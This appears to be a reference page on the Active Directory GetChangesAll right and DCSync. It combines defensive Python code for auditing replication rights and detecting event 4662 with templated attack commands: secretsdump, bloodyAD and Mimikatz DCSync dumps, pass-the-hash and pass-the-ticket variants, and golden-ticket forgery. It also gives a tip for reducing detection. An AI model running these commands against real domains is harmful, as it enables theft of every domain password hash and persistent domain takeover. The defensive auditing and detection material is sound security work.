GetChangesAll

Source principal holds the DS-Replication-Get-Changes-All extended right on the domain object. On its own this right is not abusable; GetChanges must also be held to perform DCSync.

Applies to: User/Group/Computer → Domain

This edge is not exploitable alone. Combined with GetChanges it enables full DCSync (all password hashes, including krbtgt).
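Whether a principal has the complete DCSync primitive can be checked straight from the domain object's DACL. The following is an added example, not part of the original page and not BloodHound's own code: the ACEs, principal names and allowlist are constructed sample data, and the two GUIDs are the standard schema constants for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Only allow-ACEs with an explicit right GUID are modelled; deny ACEs, inheritance and GenericAll/AllExtendedRights grants are out of scope.

```python
"""Audit which principals hold the two replication rights on the domain object.

Added example for this page (not from the original): the ACEs below are
constructed sample data in the shape of (trustee, extended-right GUID) pairs
as read from the domain naming context's DACL.
"""
from collections import defaultdict

# Extended-right GUIDs (standard AD schema constants, lower-cased for comparison)
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All

# Constructed allowlist of principals expected to hold both rights on a healthy domain
EXPECTED_HOLDERS = {
    "CORP\\Domain Controllers",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "BUILTIN\\Administrators",
}

# Constructed sample DACL: (trustee, object-type GUID of the granted extended right)
SAMPLE_ACES = [
    ("CORP\\Domain Controllers", "1131F6AA-9C07-11D1-F79F-00C04FC2DCD2"),
    ("CORP\\Domain Controllers", "1131F6AD-9C07-11D1-F79F-00C04FC2DCD2"),
    ("BUILTIN\\Administrators", GET_CHANGES),
    ("BUILTIN\\Administrators", GET_CHANGES_ALL),
    ("CORP\\Enterprise Read-only Domain Controllers", GET_CHANGES),  # GetChanges only
    ("CORP\\svc-backup", GET_CHANGES_ALL),                           # this page's edge, alone
    ("CORP\\svc-sync", GET_CHANGES),
    ("CORP\\svc-sync", GET_CHANGES_ALL),                             # both rights: full DCSync
]


def rights_by_trustee(aces):
    """Group the replication-right GUIDs each trustee holds (case-insensitive)."""
    held = defaultdict(set)
    for trustee, guid in aces:
        guid = guid.lower()
        if guid in (GET_CHANGES, GET_CHANGES_ALL):
            held[trustee].add(guid)
    return held


def dcsync_capable(aces):
    """Trustees holding BOTH rights: these can replicate secrets (DCSync)."""
    return sorted(t for t, g in rights_by_trustee(aces).items()
                  if {GET_CHANGES, GET_CHANGES_ALL} <= g)


def get_changes_all_only(aces):
    """Trustees with the GetChangesAll edge but not GetChanges: not exploitable
    alone, but one additional grant away from DCSync, so worth reviewing."""
    return sorted(t for t, g in rights_by_trustee(aces).items()
                  if g == {GET_CHANGES_ALL})


def unexpected_dcsync(aces, allowlist=EXPECTED_HOLDERS):
    """DCSync-capable trustees that are not on the expected-holders allowlist."""
    return [t for t in dcsync_capable(aces) if t not in allowlist]


if __name__ == "__main__":
    print("DCSync-capable:", dcsync_capable(SAMPLE_ACES))
    print("Unexpected:", unexpected_dcsync(SAMPLE_ACES))
    print("GetChangesAll only:", get_changes_all_only(SAMPLE_ACES))
```

On a real domain the ACE list would come from the security descriptor of the domain naming context (for example via an LDAP read of nTSecurityDescriptor); the allowlist should be derived from the Domain Controllers group rather than hard-coded as here.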


Linux Abuse

If GetChanges is also held: full DCSync

# Full domain dump (password auth)
secretsdump.py -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>'

# Pass-the-Hash
secretsdump.py -outputfile 'dcsync' -hashes ':<ntlm-hash>' -dc-ip <dc-ip> '<domain>/<username>@<dc-ip>'

# Pass-the-Ticket (Kerberos)
KRB5CCNAME=<ccache> secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>@<dc-hostname>'

# Single high-value target
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user krbtgt
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user Administrator

# NTLM hashes only
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-ntlm

bloodyAD

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get dcSync
bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get dcSync --user krbtgt

Post-DCSync: Golden Ticket (Linux)

# Get domain SID
lookupsid.py '<domain>/<username>:<password>@<dc-ip>' 0

# Forge golden ticket
ticketer.py -nthash '<krbtgt-ntlm-hash>' -domain-sid '<domain-sid>' -domain '<domain>' 'Administrator'
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass '<domain>/Administrator@<dc-hostname>'

Windows Abuse

Mimikatz DCSync (requires GetChanges also held)

mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Invoke-Mimikatz

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /all /csv"'

SharpKatz

.\SharpKatz.exe --Command dcsync --User krbtgt --Domain <domain> --DomainController <dc-hostname>

Post-DCSync: Golden Ticket (Windows)

mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-ntlm-hash> /ptt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Opsec

  • GetChangesAll is the higher-privilege right; on its own it does not enable DCSync, but together with GetChanges it is the complete DCSync primitive
  • Replication traffic originates from the attacker IP to DC ports 135/445; non-DC initiators are anomalous
  • Event ID 4662 with GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (GetChangesAll) is a high-fidelity detection signal
  • Limit scope: request only krbtgt and Administrator to minimize 4662 event volume
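The 4662 signal above is straightforward to operationalise. The following detection is an added example, not from the original page: the events, account names and DC allowlist are constructed, and the matching rule (Control Access bit 0x100 set plus the GetChangesAll GUID in Properties, with a subject that is not a DC computer account) is an assumption about how the events are shaped once exported from the Security log.

```python
"""Flag DCSync-style replication requests in Security event 4662.

Added example (not from the original page). The events below are constructed
in the shape of the 4662 fields relevant here (SubjectUserName, AccessMask,
Properties); the DC computer-account names are assumptions.
"""
import re

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
CONTROL_ACCESS = 0x100                                    # ADS_RIGHT_DS_CONTROL_ACCESS

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Computer accounts that legitimately replicate (assumed names for this example)
DC_ACCOUNTS = {"CORP\\DC01$", "CORP\\DC02$"}

# Constructed sample events (subset of 4662 / 4624 fields)
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},   # DC-to-DC replication
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "svc-sync",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},   # non-DC subject: alert
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "AccessMask": "0x20",                                       # ordinary read access
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "svc-sync"},
]


def replication_rights(event):
    """Replication-right GUIDs present in the event's Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return guids & {GET_CHANGES, GET_CHANGES_ALL}


def is_replication_request(event):
    """True for a 4662 exercising Control Access with GetChangesAll present."""
    if event.get("EventID") != 4662:
        return False
    mask = int(str(event.get("AccessMask", "0")), 16)
    return bool(mask & CONTROL_ACCESS) and GET_CHANGES_ALL in replication_rights(event)


def suspicious_replication(events, dc_accounts=DC_ACCOUNTS):
    """Replication requests whose subject is not a known DC computer account."""
    hits = []
    for ev in events:
        if not is_replication_request(ev):
            continue
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if subject not in dc_accounts:
            hits.append(subject)
    return hits


if __name__ == "__main__":
    print("Suspicious replication by:", suspicious_replication(SAMPLE_EVENTS))
```

Two practical caveats: 4662 for these rights is only written if the domain object's SACL audits Control Access (Audit Directory Service Access must be enabled and the audit entry present), and the DC allowlist should be built from the Domain Controllers group so that a freshly promoted DC does not generate false positives.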